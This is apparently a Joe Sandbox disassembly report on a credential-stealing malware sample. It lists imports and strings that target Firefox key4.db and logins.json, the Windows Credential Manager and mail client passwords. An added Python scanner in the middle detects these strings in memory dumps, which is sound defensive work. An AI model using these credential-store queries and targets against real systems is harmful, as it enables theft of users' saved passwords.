                                                              • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                              • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                              • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                              APIs
                                                              • memset.MSVCRT ref: 00406782
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                              • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                              • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                              • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                              • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                              • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                              • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                              • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                              • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                              • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                              Strings
                                                              • , xrefs: 00406834
                                                              • key4.db, xrefs: 00406756
                                                              • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                              • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp$memsetstrlen
                                                              • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                              • API String ID: 3614188050-3983245814
                                                              • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                              • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                              • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                              • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A973
                                                              • memset.MSVCRT ref: 0040A996
                                                              • memset.MSVCRT ref: 0040A9AC
                                                              • memset.MSVCRT ref: 0040A9BC
                                                              • sprintf.MSVCRT ref: 0040A9F0
                                                              • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                              • sprintf.MSVCRT ref: 0040AABE
                                                              • _mbscat.MSVCRT ref: 0040AAED
                                                                • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                              • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                              • sprintf.MSVCRT ref: 0040AB21
                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                              • API String ID: 710961058-601624466
                                                              • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                              • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                              • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                              • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: sprintf$memset$_mbscpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 3402215030-3842416460
                                                              • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                              • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                              • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                              • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                              APIs
                                                                • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                              • strlen.MSVCRT ref: 0040F139
                                                              • strlen.MSVCRT ref: 0040F147
                                                              • memset.MSVCRT ref: 0040F187
                                                              • strlen.MSVCRT ref: 0040F196
                                                              • strlen.MSVCRT ref: 0040F1A4
                                                              • memset.MSVCRT ref: 0040F1EA
                                                              • strlen.MSVCRT ref: 0040F1F9
                                                              • strlen.MSVCRT ref: 0040F207
                                                              • _strcmpi.MSVCRT ref: 0040F2B2
                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                              • String ID: logins.json$none$signons.sqlite$signons.txt
                                                              • API String ID: 2003275452-3138536805
                                                              • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                              • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                              • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                              • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C3F7
                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                              • strrchr.MSVCRT ref: 0040C417
                                                              • _mbscat.MSVCRT ref: 0040C431
                                                              • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                              • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                              • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                              • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                              • API String ID: 1012775001-1343505058
                                                              • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                              • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                              • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                              • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi
                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                              • API String ID: 1439213657-1959339147
                                                              • Opcode ID: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                              • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                              • Opcode Fuzzy Hash: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                              • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
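The functions above carry the strings that identify the embedded password-recovery component rather than Remcos' own code: the two key4.db SQL queries (`SELECT item1,item2 FROM metadata WHERE id = 'password'`, `SELECT a11,a102 FROM nssPrivate`), the Firefox login stores (`logins.json`, `signons.sqlite`, `signons.txt`, loaded through `nss3.dll`/`sqlite3.dll`) and the NirSoft-style `/scomma`, `/shtml`, `/skeepass`, `/stab`, `/stabular`, `/sverhtml`, `/sxml` export switches. The following is an added example, not part of the Joe Sandbox report or of the sample, that scans a memory-dump buffer for exactly those strings, groups the hits per component and returns a verdict; the component names, the verdict thresholds and the two constructed dump buffers are assumptions made for illustration, while every needle string is copied verbatim from the Strings sections of this report.

```python
"""Scan a raw memory dump for the credential-harvesting indicator strings
listed in this report and report them grouped by component.

Added example; not code from the report or from the analysed sample.
Needle strings are copied from the report's Strings sections; the grouping,
thresholds and sample buffers below are illustrative assumptions.
"""

# Indicator strings taken from the function-analysis Strings sections.
INDICATORS = {
    "firefox_key4db": [
        b"key4.db",
        b"SELECT item1,item2 FROM metadata WHERE id = 'password'",
        b"SELECT a11,a102 FROM nssPrivate",
    ],
    "firefox_login_store": [
        b"logins.json",
        b"signons.sqlite",
        b"signons.txt",
        b"nss3.dll",
        b"sqlite3.dll",
    ],
    "nirsoft_export_switches": [
        b"/scomma", b"/shtml", b"/skeepass", b"/stab",
        b"/stabular", b"/sverhtml", b"/sxml",
    ],
    "mail_credentials": [
        b"Software\\Microsoft\\Windows Live Mail",
    ],
}


def scan_dump(buf: bytes) -> dict:
    """Return {component: [(needle, first_offset), ...]} for needles found in buf."""
    hits = {}
    for component, needles in INDICATORS.items():
        found = []
        for needle in needles:
            off = buf.find(needle)          # first occurrence, -1 if absent
            if off != -1:
                found.append((needle.decode("ascii"), off))
        if found:
            hits[component] = found
    return hits


def verdict(hits: dict, min_components: int = 2) -> str:
    """Assumed scoring: a key4.db SQL query alone is specific enough to flag;
    otherwise require hits in at least `min_components` independent groups.
    A lone file name such as logins.json also occurs in benign Firefox memory."""
    key4 = {name for name, _ in hits.get("firefox_key4db", [])}
    if key4 & {"SELECT item1,item2 FROM metadata WHERE id = 'password'",
               "SELECT a11,a102 FROM nssPrivate"}:
        return "strong"
    if len(hits) >= min_components:
        return "strong"
    return "weak" if hits else "none"


# Constructed sample buffers standing in for process memory dumps (not real data).
SAMPLE_DUMP = (
    b"\x00" * 16 + b"MZ\x90\x00" + b"\x00" * 40
    + b"SELECT item1,item2 FROM metadata WHERE id = 'password'\x00"
    + b"SELECT a11,a102 FROM nssPrivate\x00key4.db\x00logins.json\x00"
    + b"/scomma\x00/shtml\x00Software\\Microsoft\\Windows Live Mail\x00"
)
BENIGN_DUMP = b"\x00" * 32 + b"logins.json\x00profile.ini\x00" + b"\x00" * 32


if __name__ == "__main__":
    for label, dump in (("sample", SAMPLE_DUMP), ("benign", BENIGN_DUMP)):
        hits = scan_dump(dump)
        print(f"{label}: verdict={verdict(hits)}")
        for component, found in hits.items():
            for name, off in found:
                print(f"  {component:24s} {off:#010x} {name}")
```

Run it against a `.sdmp` file read in binary mode instead of the constructed buffers to reproduce the grouping on the actual dump; the offsets it prints are buffer offsets, so add the dump's load base (0x400000 for this module) to compare them with the `ref:` addresses above.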
                                                              APIs
                                                              • memset.MSVCRT ref: 00444612
                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                              • strlen.MSVCRT ref: 0044462E
                                                              • memset.MSVCRT ref: 00444668
                                                              • memset.MSVCRT ref: 0044467C
                                                              • memset.MSVCRT ref: 00444690
                                                              • memset.MSVCRT ref: 004446B6
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                              • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                              • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                              • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                              • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                              • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset$strlen$_mbscpy
                                                              • String ID: salu
                                                              • API String ID: 3691931180-4177317985
                                                              • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                              • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                              • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                              • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                              • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                              • API String ID: 2449869053-232097475
                                                              • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                              • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                              • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                              • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                              APIs
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • strlen.MSVCRT ref: 00443AD2
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                              • memset.MSVCRT ref: 00443B2E
                                                              • memset.MSVCRT ref: 00443B4B
                                                              • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                              • LocalFree.KERNEL32(?), ref: 00443C23
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpymemset$??2@??3@AddressByteCharFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                              • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail$`{g
                                                              • API String ID: 4030136668-1743892429
                                                              • Opcode ID: 8d63d9ccfc49efb257c43273cbef49ec7928a411306aa0b1e98862e3d40e68ab
                                                              • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                              • Opcode Fuzzy Hash: 8d63d9ccfc49efb257c43273cbef49ec7928a411306aa0b1e98862e3d40e68ab
                                                              • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                              APIs
                                                              • sprintf.MSVCRT ref: 0040957B
                                                              • LoadMenuA.USER32(?,?), ref: 00409589
                                                                • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                              • DestroyMenu.USER32(00000000), ref: 004095A7
                                                              • sprintf.MSVCRT ref: 004095EB
                                                              • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                              • memset.MSVCRT ref: 0040961C
                                                              • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                              • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                              • DestroyWindow.USER32(00000000), ref: 0040965C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                              • String ID: caption$dialog_%d$menu_%d
                                                              • API String ID: 3259144588-3822380221
                                                              • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                              • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                              • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                              • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                              APIs
                                                                • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                              • API String ID: 2449869053-4258758744
                                                              • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                              • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                              • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                              • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                              APIs
                                                              • wcsstr.MSVCRT ref: 0040426A
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                              • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                              • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                              • strchr.MSVCRT ref: 004042F6
                                                              • strlen.MSVCRT ref: 0040430A
                                                              • sprintf.MSVCRT ref: 0040432B
                                                              • strchr.MSVCRT ref: 0040433C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                              • String ID: %s@gmail.com$www.google.com
                                                              • API String ID: 3866421160-4070641962
                                                              • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                              • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                              • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                              • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                              APIs
                                                              • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                              • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                              • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                              • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                              • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                              • memset.MSVCRT ref: 004097BD
                                                              • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                              • String ID: TranslatorName$TranslatorURL$general$strings
                                                              • API String ID: 1035899707-3647959541
                                                              • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                              • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                              • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                              • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                              APIs
                                                              • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy
                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                              • API String ID: 714388716-318151290
                                                              • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                              • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                              • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                              • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                              APIs
                                                              • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                              • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                              • SelectObject.GDI32(?,?), ref: 0040CACC
